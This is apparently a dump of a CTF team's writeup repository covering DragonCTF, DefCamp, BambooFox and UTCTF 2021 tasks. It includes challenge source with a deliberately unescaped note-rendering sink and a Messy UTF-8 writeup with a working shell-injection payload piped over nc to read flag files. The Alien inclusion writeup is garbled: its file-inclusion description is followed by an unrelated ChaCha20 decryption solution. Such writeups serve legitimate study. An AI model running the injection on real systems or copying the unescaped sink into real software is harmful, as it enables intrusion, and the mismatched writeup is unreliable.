      button.btn.btn-lg.btn-primary.btn-block(id='submit', type='submit') Login

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/views/new.pug:
--------------------------------------------------------------------------------
extends layout

block title
  | New Note

block content
  form.form(action='/notes/new', method='POST')
    input(type='hidden', name='_csrf', value=csrfToken)
    div.mb-3
      input.form-control(type='text', name='title', placeholder='Title')
    div.mb-3
      textarea.form-control(name='content', placeholder='Content', rows=20)
    div.mb-3
      div.form-check
        input.form-check-input(name='favourite', type='checkbox', id='favourite')
        label.form-check-label(for='favourite') Favourite
    div.mb-3
      button.btn.btn-lg.btn-primary.btn-block(type='submit') Add

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/views/note.pug:
--------------------------------------------------------------------------------
extends layout

append title
  = " - "
  = note.title

block content
  .row
    .col-lg-8
      h1.mt-4
        if note.favourite
          img(src="/static/star.svg")
        =note.title

      div !{note.content}

      div
        a.btn.btn-link(href=`/notes/${note.id}/edit`) Edit

        form.inline(method='POST', action=`/notes/${note.id}/delete`)
          input(type='hidden', name='_csrf', value=csrfToken)
          button.btn.btn-link(type='submit') Delete

        form.inline(method='POST', action=`/notes/${note.id}/report`)
          input(type='hidden', name='_csrf', value=csrfToken)
          button.btn.btn-link(type='submit') Report

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/views/notes.pug:
--------------------------------------------------------------------------------
extends layout

block title
  | My Notes

block content
  if query
    p Search for "#{query}" returned !{notes.length} results.
  if notes.length > 0
    each note in notes
      .row
        .col-lg-8
          a(href=`/notes/${note.id}`)
            h1.mt-4
              if note.favourite
                img(src="/static/star.svg")
              =note.title
  else if !query
    .row
      .col-lg-8
        p You need to create some notes first!

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/views/register.pug:
--------------------------------------------------------------------------------
extends layout

block content
  form.form-signin(action='/register', method='POST')
    input(type='hidden', name='_csrf', value=csrfToken)
    .mb-3
      input.form-control(type='text', name='name', placeholder='Username')
    .mb-3
      input.form-control(type='password', name='password', placeholder='Password')
    .mb-3
      input.form-control(type='password', name='password_confirmation', placeholder='Repeat your password')
    .mb-3
      button.btn.btn-lg.btn-primary.btn-block(type='submit') Register

--------------------------------------------------------------------------------
/2020-11-22-DragonCTF/scratchpad/files/sources/watch.ts:
--------------------------------------------------------------------------------
import * as assert from 'assert';
import * as massive from 'massive';
import {Builder, By} from 'selenium-webdriver';
import * as firefox from 'selenium-webdriver/firefox';
import {UserPromptHandler} from 'selenium-webdriver/lib/capabilities';
import {URL} from 'url';

assert.ok(process.env.SITE_URL, 'SITE_URL is not set');
assert.ok(process.env.ADMIN_PASSWORD, 'ADMIN_PASSWORD is not set');
assert.ok(process.env.DB, 'DB is not set');

function timeout(delay: number) {
  return new Promise(resolve => setTimeout(resolve, delay));
}

async function checkReport(id: string, baseUrl: string, adminPassword: string) {
  console.log(`Checking ${new URL(`/notes/${id}`, baseUrl)}`);
  const driver = new Builder()
      .forBrowser('firefox')
      .setFirefoxOptions(
          new firefox.Options().headless().setAlertBehavior(
              UserPromptHandler.DISMISS) as firefox.Options)
      .build();
  try {
    console.log('Logging in');
    await driver.get(new URL('/login', baseUrl).toString());
    let el = await driver.findElement(By.id('name'));
    await el.sendKeys('admin');
    el = await driver.findElement(By.id('password'));
    await el.sendKeys(adminPassword);
    el = await driver.findElement(By.id('submit'));
    await el.click();

    console.log('Visiting report');
    await driver.get(new URL(`/notes/${id}`, baseUrl).toString());
    await driver.sleep(30 * 1000);
  } finally {
    await driver.quit();
  }
}

async function main() {
  const db = await massive(process.env.DB);

  while (true) {
    const reports = await db.reports.destroy();
    console.log(`Got ${reports.length} reports`);
    for (let report of reports) {
      await checkReport(
          report.id, process.env.SITE_URL, process.env.ADMIN_PASSWORD)
          .catch(console.log);
    }
    await timeout(5000);
  }
}

main();

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/README.md:
--------------------------------------------------------------------------------
# DefCamp CTF 2020 (as r5)

Team: Shalom, nazywam, XeR, Posix, mastho

### Table of contents

* [Why XOR (crypto)](xor)
* [Bro64 (crypto)](bro64)
* [yopass-go (re)](yopass)
* [stripped-go (re)](stripped)
* [secret-reverse (re)](secret)
* [modern login (re)](modern)
* [basic coms (forensics)](basiccoms)
* [t3am_vi3w3r (forensics)](team)
* [notor (forensics)](notor)
* [spy-agency (forensics)](spy)
* [hunting into the wild (forensics)](hunting)
* [inorder (misc)](inorder)
* [alien inclusion (web)](alien)
* [broken login (web)](broken)
* [http-for-pros (web)](pros)
* [stug reference (stegano)](stug)

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/alien/README.md:
--------------------------------------------------------------------------------
# Alien inclusion (web, 50p, 149 solved)

## Description

```
Keep it local and you should be fine. The flag is in /var/www/html/flag.php.

Flag format: CTF{sha256}
```

In the task we get access to a simple webpage.

## Task analysis

Webpage displays the source:

```php
```

we need to guess what algorithm was used to encrypt the data, and decrypt the flag.
A classic example of a terrible task design.

## Solution

Knowing cryptography actually not only doesn't help, but also makes this task harder.
We tried lots of different encryptions which match the parameters (like AES-CTR, AES-CCM, AES-GCM etc.), until we finally got a hit with ChaCha20.
And only then we realised that there was a `dance` reference in the task description...

```python
import base64

from Crypto.Cipher import ChaCha20  # PyCryptodome

data = {"nonce": "dcfu+qXOX30=", "ciphertext": "nT0/C209haz3XQs6JcvrEhkbRXnzZiyR87vI82VDvfaQh9eajLNIzkG51TnZg81g7IEPd3UJElZz8xhCMlVb/cXHJO9h",
        "key": "Fidel_Alejandro_Castro_Ruz_Cuba!"}
nonce = base64.b64decode(data['nonce'])
ct = base64.b64decode(data['ciphertext'])
key = data['key'].encode()  # ChaCha20.new() expects the 32-byte key as bytes
cipher = ChaCha20.new(key=key, nonce=nonce)
plaintext = cipher.decrypt(ct)
print(plaintext)
```

And we get `ctf{f38deb0782c0f252090a52b2f1a5b05bf2964272f65d5c3580be631f52f4b3e0}`

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/inorder/inorder.py:
--------------------------------------------------------------------------------
import sys
import time

FLAG = "REDACTED"
TOTAL_INSERTS = 0

class Node:

    def __init__(self, data):
        self.left = None
        self.right = None
        self.data = data

    def insert(self, data):
        newnode = Node(data)

        x = self
        y = None

        while (x != None):
            y = x
            if (data < x.data):
                x = x.left
            else:
                x = x.right

        if (y == None):
            y = newnode

        elif (data < y.data):
            y.left = newnode
        else:
            y.right = newnode

        return y

    def findval(self, lkpval, steps=0):
        if lkpval < self.data:
            if self.left is None:
                return False
            return self.left.findval(lkpval, steps+1)
        elif lkpval > self.data:
            if self.right is None:
                return False
            return self.right.findval(lkpval, steps+1)
        else:
            return True

    def PrintTree(self, order=""):
        if self.left:
            self.left.PrintTree("left")
        print( self.data, order),
        if self.right:
            self.right.PrintTree("right")


r = Node('')
print((
    "Tell me your pleasure.\n"
    "/a values\n"
    "/s value\n"
    "/p\n"
    "/exit\n"
    )
)

while(True):
    inp = input("Your option: ")
    if(inp.startswith("/a")):
        values = inp.split(" ")[1].split(";")
        for val in values:
            if len(values) > 10001:
                break

            TOTAL_INSERTS += 1
            r.insert(val)

        print(TOTAL_INSERTS)
        sys.stdout.flush()
    elif(inp.startswith("/s")):
        print(r.findval(inp.split(" ")[1]))
        sys.stdout.flush()
    elif(inp.startswith("/p")):
        print(r.PrintTree())
        sys.stdout.flush()
    elif(inp.startswith("/exit")):
        if(r.findval(FLAG)):
            sys.stdout.flush()
            break
        else:
            break

print("Bye!")
sys.exit()

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/modern/modern-login.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/modern/modern-login.apk

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/secret/rev_secret_secret:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/secret/rev_secret_secret

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/spy/app-release.apk.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/spy/app-release.apk.zip

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/spy/coordinates_can_be_found_here.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/spy/coordinates_can_be_found_here.jpg

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/stripped/rev_strippedGo_strippedGO.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/stripped/rev_strippedGo_strippedGO.out

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/stug/README.md:
--------------------------------------------------------------------------------
# Stug reference (Stegano, 50p, 136 solved)

## Description

```
Do you have your own stug pass hidden within?

Flag format: ctf{sha256}
```

In the task we get an image:

![](stug.jpg)

## Task analysis

It's clear that the task hints at using `steghide`.

## Solution

We run:

```
steghide.exe --extract -sf stug.jpg
```

And guess the password to be `stug` and get: `ctf{32849dd9d7e7b313c214a7b1d004b776b4af0cedd9730e6ca05ef725a18e38e1}`

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/stug/stug.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/stug/stug.jpg

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/xor/README.md:
--------------------------------------------------------------------------------
# Why XOR (crypto, 50p, 134 solved)

## Description

```
Let's be fair, we all start with XOR, and we keep enjoying it.

Flag format: CTF{sha256}
```

In the task we get a simple [python script](xor.py)

## Task analysis

The idea is pretty simple - the flag was XORed with some unknown keystream.
The hint suggests that the first 3 bytes of the keystream are the same as the first 3 bytes of the flag.

## Solution

We could assume that the flag prefix is `CTF` as stated in the task description.
This proves to be an invalid assumption, because it turns out we should have guessed that it's actually `ctf` instead.

Although the code does not suggest it, we can also guess that the XOR key is repeated:

```python
def xor_string(s1, s2):
    # Same character-wise XOR as the list comprehension in xor.py
    return ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(s1, s2))

xored = ['\x00', '\x00', '\x00', '\x18', 'C', '_', '\x05', 'E', 'V', 'T', 'F', 'U', 'R', 'B', '_', 'U', 'G', '_', 'V', '\x17', 'V', 'S', '@', '\x03', '[',
         'C', '\x02', '\x07', 'C', 'Q', 'S', 'M', '\x02', 'P', 'M', '_', 'S', '\x12', 'V', '\x07', 'B', 'V', 'Q', '\x15', 'S', 'T', '\x11', '_', '\x05',
         'A', 'P', '\x02', '\x17', 'R', 'Q', 'L', '\x04', 'P', 'E', 'W', 'P', 'L', '\x04', '\x07', '\x15', 'T', 'V', 'L', '\x1b']
keystream = 'ctf'
data = ''.join(xored)
print(xor_string(keystream * 100, data))
```

And we get `ctf{79f107231696395c004e87dd7709d3990f0d602a57e9f56ac428b31138bda258}`

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/xor/xor.py:
--------------------------------------------------------------------------------
xored = ['\x00', '\x00', '\x00', '\x18', 'C', '_', '\x05', 'E', 'V', 'T', 'F', 'U', 'R', 'B', '_', 'U', 'G', '_', 'V', '\x17', 'V', 'S', '@', '\x03', '[', 'C', '\x02', '\x07', 'C', 'Q', 'S', 'M', '\x02', 'P', 'M', '_', 'S', '\x12', 'V', '\x07', 'B', 'V', 'Q', '\x15', 'S', 'T', '\x11', '_', '\x05', 'A', 'P', '\x02', '\x17', 'R', 'Q', 'L', '\x04', 'P', 'E', 'W', 'P', 'L', '\x04', '\x07', '\x15', 'T', 'V', 'L', '\x1b']
s1 = ""
s2 = ""
# ['\x00', '\x00', '\x00'] at start of xored is the best hint you get
a_list = [chr(ord(a) ^ ord(b)) for a,b in zip(s1, s2)]
print(a_list)
print("".join(a_list))

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/yopass/README.md:
--------------------------------------------------------------------------------
# Yopass Go (re, 50p, 153 solved)

## Description

```
The password is so clear that it is the flag itself.

Flag format: CTF{sha256}
```

In the task we get a [binary](yopass).

## Solution

We are not sure what the binary does at all, but a first sanity check with `strings yopass | grep ctf{` gives:

`ctf{0962393ce380c3cf696c6c59a085cde0f7edd1382f2e9090220abdf9a6396c88}`

--------------------------------------------------------------------------------
/2020-12-05-DefCampCTF/yopass/yopass:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-12-05-DefCampCTF/yopass/yopass

--------------------------------------------------------------------------------
/2021-01-16-BambooFox/README.md:
--------------------------------------------------------------------------------
# BambooFox CTF 2021

Team: BitK, Sebbb, Shalom, SIben, Posix, XeR

### Table of contents

* [Babystack (pwn)](babystack)
* [wxpage (pwn)](wxpage)
* [House of CSY (pwn)](hoc)
* [Flag Checker Revenge (reverse)](flag_checker)
* [TuringMachineDiagram (reverse)](turing)
* [NGSteg (misc)](ngsteg)

--------------------------------------------------------------------------------
/2021-01-16-BambooFox/flag_checker/README.md:
--------------------------------------------------------------------------------
# Flag Checker Revenge - BambooFox CTF 2021 (reverse, 101p)

## Introduction
Flag Checker Revenge is a reverse task.

An x64 ELF binary is given.

## Reverse engineering
The binary reads a password on the standard input. It then checks that the size
of the input is `0x2b` bytes.

The binary then calls a series of 500 functions that all do different checks on
some parts of the flag.

This can be solved with `angr`.

**Flag**: `flag{4ll_7h3_w4y_70_7h3_d33p357_v4l1d4710n}`

## Appendices
### pwn.py
```python
import angr

BASE = 0x00400000
START = BASE + 0x00009a95
GOOD = BASE + 0x00009ab7
BAD = BASE + 0x00009ac5

project = angr.Project("./task")
state = project.factory.blank_state(addr=START)
state.regs.rbp = state.regs.rsp
state.regs.rsp = state.regs.rbp - 0x50

# Specify the flag
flag = state.solver.BVS("password", 0x2B * 8)
state.memory.store(state.regs.rbp - 0x50, flag)

for i in range(0x2B):
    char = (flag >> (8 * i)) & 0xFF
    state.solver.add(0x20 <= char)
    state.solver.add(char < 0x80)

simulation = project.factory.simgr(state)
simulation.explore(find=GOOD, avoid=BAD)

if simulation.found:
    solution = simulation.found[0].solver.eval(flag)
    print(hex(solution)[2:])
```

--------------------------------------------------------------------------------
/2021-03-13-UTCTF/README.md:
--------------------------------------------------------------------------------
# UTCTF 2021

Team: Sebbb, Shalom, Posix, XeR

### Table of contents

* [Sizzling bacon (beginner/crypto)](bacon)
* [Various Vernacular (beginner/crypto)](various)
* [Emoji encryption (misc)](emoji)
* [Python shell (misc)](pyjail)
* [Farmers only (misc/crypto)](farmer)
* [RF is sOOKy (misc)](radio)
* [Doubly deleted data (for)](delete)
* [OSINT part 2 (for)](osint2)
* [Sandwiched (for)](sandwich)
* [smol data (for)](smol_data)
* [Small p problems (crypto)](small_p)
* [Illegal prime (crypto)](illegal)
* [Prove no knowledge (crypto)](zkp)
* [A bit weird (crypto)](a_bit)
* [Sleeves (crypto)](sleeves)
* [Chilly beef code (crypto)](cbc)
* [Functional Programming (pwn)](functional)
* [Resolve (pwn)](resolve)
* [Linker Machine Broke (pwn)](linker)
* [Messy UTF-8
(pwn)](messy_utf8) 27 | * [AEG (pwn)](aeg) 28 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/a_bit/bit_weird.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util import number 2 | from secret import flag 3 | import os 4 | 5 | length = 2048 6 | p, q = number.getPrime(length//2), number.getPrime(length//2) 7 | N = p*q 8 | e = 3 9 | 10 | m = number.bytes_to_long(flag) 11 | x = number.bytes_to_long(os.urandom(length//8)) 12 | 13 | c = pow(m|x, e, N) 14 | print('N =', N); 15 | print('e =', e); 16 | print('c =', c); 17 | print('m&x =', m&x); 18 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/a_bit/bit_weird_msg.txt: -------------------------------------------------------------------------------- 1 | N = 13876129555781460073002089038351520612247655754841714940325194761154811715694900213267064079029042442997358889794972854389557630367771777876508793474170741947269348292776484727853353467216624504502363412563718921205109890927597601496686803975210884730367005708579251258930365320553408690272909557812147058458101934416094961654819292033675534518433169541534918719715858981571188058387655828559632455020249603990658414972550914448303438265789951615868454921813881331283621117678174520240951067354671343645161030847894042795249824975975123293970250188757622530156083354425897120362794296499989540418235408089516991225649 2 | e = 3 3 | c = 
6581985633799906892057438125576915919729685289065773835188688336898671475090397283236146369846971577536055404744552000913009436345090659234890289251210725630126240983696894267667325908895755610921151796076651419491871249815427670907081328324660532079703528042745484899868019846050803531065674821086527587813490634542863407667629281865859168224431930971680966013847327545587494254199639534463557869211251870726331441006052480498353072578366929904335644501242811360758566122007864009155945266316460389696089058959764212987491632905588143831831973272715981653196928234595155023233235134284082645872266135170511490429493 4 | m&x = 947571396785487533546146461810836349016633316292485079213681708490477178328756478620234135446017364353903883460574081324427546739724 5 | 6 | x = 15581107453382746363421172426030468550126181195076252322042322859748260918197659408344673747013982937921433767135271108413165955808652424700637809308565928462367274272294975755415573706749109706624868830430686443947948537923430882747239965780990192617072654390726447304728671150888061906213977961981340995242772304458476566590730032592047868074968609272272687908019911741096824092090512588043445300077973100189180460193467125092550001098696240395535375456357081981657552860000358049631730893603020057137233513015505547751597823505590900290756694837641762534009330797696018713622218806608741753325137365900124739257740 7 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/aeg/angr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/aeg/angr.png -------------------------------------------------------------------------------- /2021-03-13-UTCTF/bacon/README.md: -------------------------------------------------------------------------------- 1 | # Sizzling Bacon (beginner/crypto, 100p, 417 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | 
My buddy Francis is really into Bacon. He loves it so much that he gave me this encoded bacon-themed flag (he said he was inspired by the sound of sizzling bacon). 7 | 8 | sSsSSsSSssSSsSsSsSssSSSSSSSssS{SSSsSsSSSsSsSSSsSSsSSssssssSSSSSSSsSSSSSSSSsSSsssSSssSsSSSsSSsSSSSssssSSsssSSsSSsSSSs} 9 | ``` 10 | 11 | 12 | ## Task analysis 13 | 14 | It's pretty clear that we're dealing with Bacon Cipher just instead of A/B or 0/1 we have S and s. 15 | 16 | ## Solution 17 | 18 | We can change the input into more classic version: 19 | 20 | ```python 21 | ct = 'sSsSSsSSssSSsSsSsSssSSSSSSSssS{SSSsSsSSSsSsSSSsSSsSSssssssSSSSSSSsSSSSSSSSsSSsssSSssSsSSSsSSsSSSSssssSSsssSSsSSsSSSs}' 22 | ct = ct.replace('S', '0').replace('s', '1') 23 | print(ct) 24 | ``` 25 | 26 | And drop into cyberchef https://gchq.github.io/CyberChef/#recipe=Bacon_Cipher_Decode('Complete','0/1',false)&input=MTAxMDAxMDAxMTAwMTAxMDEwMTEwMDAwMDAwMTEwezAwMDEwMTAwMDEwMTAwMDEwMDEwMDExMTExMTAwMDAwMDAxMDAwMDAwMDAxMDAxMTEwMDExMDEwMDAxMDAxMDAwMDExMTEwMDExMTAwMTAwMTAwMDF9 27 | 28 | and we get `UTFLAG{CRISPYBACONCIPHER}` 29 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/delete/README.md: -------------------------------------------------------------------------------- 1 | # Doubly deleted data (forensics, 330p, 260 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | We got a copy of an elusive hacker's home partition and gave it to someone back in HQ to analyze for us. We think the hacker deleted the file with the flag, but before our agent could find it, they accidentally deleted the copy of the partition! Now we'll never know what that flag was. 
:( 7 | ``` 8 | 9 | We get [some gzipped disk image](flash_drive.img.gz) 10 | 11 | ## Solution 12 | 13 | Load this image into your favourite hexeditor and just look for flag format, or do `strings flash_drive.img | grep utflag` and you get: 14 | 15 | ``` 16 | utflag{data_never_disappears} 17 | utflag{data_never_disappears} 18 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 19 | utflag{data_never_disappears} 20 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 21 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 22 | utflag{data_never_disappears} 23 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 24 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 25 | utflag{data_never_disappears} 26 | echo "utflag{d@t@_never_dis@ppe@rs}" > real_flag.txt 27 | ``` 28 | 29 | Submit `utflag{d@t@_never_dis@ppe@rs}` 30 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/delete/flash_drive.img.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/delete/flash_drive.img.gz -------------------------------------------------------------------------------- /2021-03-13-UTCTF/emoji/README.md: -------------------------------------------------------------------------------- 1 | # Emoji encryption (misc, 100p, 379 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | I came up with this rad new encryption. Bet no one can break it 7 | 8 | ☂️🦃🔥🦁🍎🎸{🐘🥭🧅🤹🧊☀️_💣🐘_🌋🐘🌈☀️🍎🦃🧊🦁🐘} 9 | ``` 10 | 11 | 12 | ## Task analysis 13 | 14 | Flag format is preserved, so we can expect each emoji to encode a single letter. 15 | We know that format is `utflag{}`. 16 | 17 | 18 | ## Solution 19 | 20 | First letter of the flag should be `u` and emoji is `umbrella`, second letter should be `t` and emoji is `turkey`... 
21 | 22 | `utflag{emojis_be_versatile}` 23 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/illegal/README.md: -------------------------------------------------------------------------------- 1 | # Illegal prime (crypto, 799p, 143 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | The NSA published the ciphertext from a one-time-pad. Since breaking one-time-pad is so easy, I did it for you. 7 | 8 | To avoid legal trouble I can't tell you the key. On an unrelated note I found this really cool prime number ( https://en.wikipedia.org/wiki/Illegal_prime ) 9 | ``` 10 | 11 | We get also: 12 | 13 | ``` 14 | c = 2f7f63b5e27343dcf750bf83fb4893fe3b20a87e81e6fb62c33d30 15 | 16 | p = 56594044391339477686029513026021974392498922525513994709310909529135745009448534622250639333011770158535778535848522177601610597930145120019374953248865595853915254057748042248348224821499113613633807994411737092129239655022633988633736058693251230631716531822464530907151 17 | ``` 18 | 19 | ## Task analysis 20 | 21 | Task hints at `illegal prime` story, where binary representation of certain number could be treated as machine code with an exploit. 

## Solution

If we do `print(long_to_bytes(p))` on the provided prime we get:

```
k = 5a0b05d9831438ac8561d2b0a42be1cf5613db21deb9a443e21c4d
```

Now that we have the key we can just unxor the flag:

```python
c = bytes.fromhex('2f7f63b5e27343dcf750bf83fb4893fe3b20a87e81e6fb62c33d30')
k = bytes.fromhex('5a0b05d9831438ac8561d2b0a42be1cf5613db21deb9a443e21c4d')
# XOR ciphertext and key byte by byte to undo the one-time pad.
print(bytes(x ^ y for x, y in zip(c, k)).decode())
```

And get `utflag{pr1m3_cr1m3s____!!!}`
--------------------------------------------------------------------------------
/2021-03-13-UTCTF/messy_utf8/README.md:
--------------------------------------------------------------------------------
# Messy UTF-8 - UTCTF 2021 (pwn, 987p, 38 solved)

## Introduction
Messy UTF-8 is a binary exploitation task.

An x64 ELF binary is given. It waits for user input and echoes it back.

## Reverse engineering
The binary starts by reading the user input into a buffer of size 100.
```c
char input[100];
fgets(input, 100, stdin);
```

It then calls the `escape` function on it and stores the output in a buffer of
size 400.
```c
char escaped[400];
escape(escaped, input);
```

The escape function replaces single quotes `'` with `'\''`. This is the classic
escape sequence for POSIX shells.
```c
void escape(char *out, char *in)
{
	while(*in) {
		if(*in == '\'') {
			/* ' becomes '\'' (4 bytes) */
			out[0] = '\'';
			out[1] = '\\';
			out[2] = '\'';
			out[3] = '\'';
			out += 4;
		} else {
			out[0] = in[0];
			out += 1;
		}

		in++;
	}
}
```

The output is then concatenated between `echo '` and `'`.

The new string is altered by the `parseUTF8` function. This function looks for
invalid UTF-8 codepoints and skips them.

The final string is passed to `system`.
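
The order of operations described above (escape, wrap in `echo '...'`, `parseUTF8`, then `system`), modelled in Python as an added example that is not part of the original writeup or the challenge binary. `parse_utf8` is an assumed model of the binary's function (sequence length taken from the lead byte, malformed sequences dropped whole), and `unquoted_metachars` and `build_command_hardened` are hypothetical helpers; nothing is passed to a shell.

```python
"""Model of the escape -> wrap -> parseUTF8 pipeline (added example)."""

SHELL_META = set(b";|&#`$()<>\n")
SAMPLE = b"\xF0'; foobar #"  # the input the writeup walks through


def escape(data: bytes) -> bytes:
    # Same transformation as the C escape(): ' becomes '\''
    return data.replace(b"'", b"'\\''")


def parse_utf8(data: bytes) -> bytes:
    # ASSUMED model: the lead byte announces the sequence length; if the
    # continuation bytes are malformed, the whole announced length is skipped.
    out = bytearray()
    i = 0
    while i < len(data):
        lead = data[i]
        if lead < 0x80:
            n = 1
        elif lead >> 5 == 0b110:
            n = 2
        elif lead >> 4 == 0b1110:
            n = 3
        elif lead >> 3 == 0b11110:
            n = 4
        else:
            i += 1  # stray continuation byte or invalid lead: drop one byte
            continue
        seq = data[i:i + n]
        if len(seq) == n and all((b & 0xC0) == 0x80 for b in seq[1:]):
            out += seq
        i += n
    return bytes(out)


def build_command_vulnerable(user: bytes) -> bytes:
    # Order used by the binary: escape first, rewrite the string afterwards.
    return parse_utf8(b"echo '" + escape(user) + b"'")


def build_command_hardened(user: bytes) -> bytes:
    # Validate before escaping and never rewrite the string after escaping.
    # Passing the text as an argv element instead of through a shell would
    # remove the quoting problem altogether.
    try:
        user.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise ValueError("input is not valid UTF-8") from exc
    return b"echo '" + escape(user) + b"'"


def unquoted_metachars(cmd: bytes) -> list:
    # Minimal POSIX single-quote scanner: returns the shell metacharacters
    # that end up outside '...' quoting in the final command string.
    found = []
    in_quote = False
    i = 0
    while i < len(cmd):
        c = cmd[i]
        if in_quote:
            if c == 0x27:
                in_quote = False
        elif c == 0x27:
            in_quote = True
        elif c == 0x5C:
            i += 1  # a backslash outside quotes escapes the next byte
        elif c in SHELL_META:
            found.append(chr(c))
        i += 1
    return found


if __name__ == "__main__":
    before = b"echo '" + escape(SAMPLE) + b"'"
    after = build_command_vulnerable(SAMPLE)
    print(before, unquoted_metachars(before))
    print(after, unquoted_metachars(after))
```

The scanner reports nothing for the escaped string and reports `;` and `#` once the sanitiser has run over it, which is the check to apply to any code that transforms a string after quoting it.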
50 | 51 | ## Vulnerabilities 52 | It is possible to abuse the `parseUTF8` function to skip characters. 53 | 54 | Consider an input of `\xF0'; foobar #`. The `escape` pass will transform it to 55 | `\xF0'\''; foobar #` and the concatenation part will transform it to 56 | `echo '\xF0'\''; foobar #'`. 57 | 58 | `parseUTF8` will see an invalid 4 bytes codepoint (`\xF0\x27\x5C\x27`) and skip 59 | it entirely, transforming the string to `echo ''; foobar #'`. 60 | 61 | ## Exploitation 62 | It is possible to read the `flag.txt` file with a payload of 63 | `\xF0'; cat flag.txt #` 64 | 65 | **Flag**: `utflag{shouldve_had_error_conditions871234}` 66 | 67 | ## Appendices 68 | ### pwn.sh 69 | ```sh 70 | printf "\xF0'; ls -la; cat *flag* #\n" | nc pwn.utctf.live 5434 71 | ``` 72 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/osint2/README.md: -------------------------------------------------------------------------------- 1 | # OSINT2 (forensics, 766p, 154 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | Find the origins of the linked file found in part 1. 7 | ``` 8 | 9 | ## Task analysis 10 | 11 | We start-off where we finished previous task, at https://twitter.com/ColdwaterWade and we assume we need to find the origin of image https://drive.google.com/file/d/1nhmAthcCUWZ-9ekD20nvVdlannsMPYlb/view 12 | 13 | ## Solution 14 | 15 | We simply drop this image into Google Reverse Image Search and it tells us the image comes from https://tobiasmaier.blogspot.com/2021/03/blog-post_6.html and we get flag `utflag{r3v3rs3d_t0_0r1g1nal}` 16 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/radio/README.md: -------------------------------------------------------------------------------- 1 | # RF is spOOKy (misc, 996p, 21 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | ACME corp has contracted you to figure out how to demodulate a secret RF signal recorded with an rtl-sdr. 
They have recorded many identical bursts, but your job is to demodulate one of them. 7 | Flag format: utflag{DEMODULATED_BITSTREAM} where DEMODULATED_BITSTREAM is the actual 37 bits that were transferred over the air. file format: sample rate = 180000hz , sample type = unsigned 8-bit 8 | ``` 9 | 10 | We get [some data](off.iq) 11 | 12 | 13 | ## Task analysis 14 | 15 | It's pretty clear that we have some kind of radio transmission, and it seems there is some secret bit pattern sent multiple times. 16 | Our goal is to demodulate the data and recover the bitstream. 17 | 18 | ## Solution 19 | 20 | We initially tried loading this into GNU Radio, but we realised we have absolutely no idea how to use it... 21 | So it's Audacity time! 22 | 23 | Once we load this as raw data and set the bitrate we can play this as audio. 24 | It's clear that in the middle there is a bunch of beeps. 25 | We assume that those beeps are the `bursts` with secret bits. 26 | 27 | Once we zoom-in on them we can see a clear regular pattern. 28 | What is more interesting is that if we cut this into pieces of similar length, we get... 37. 
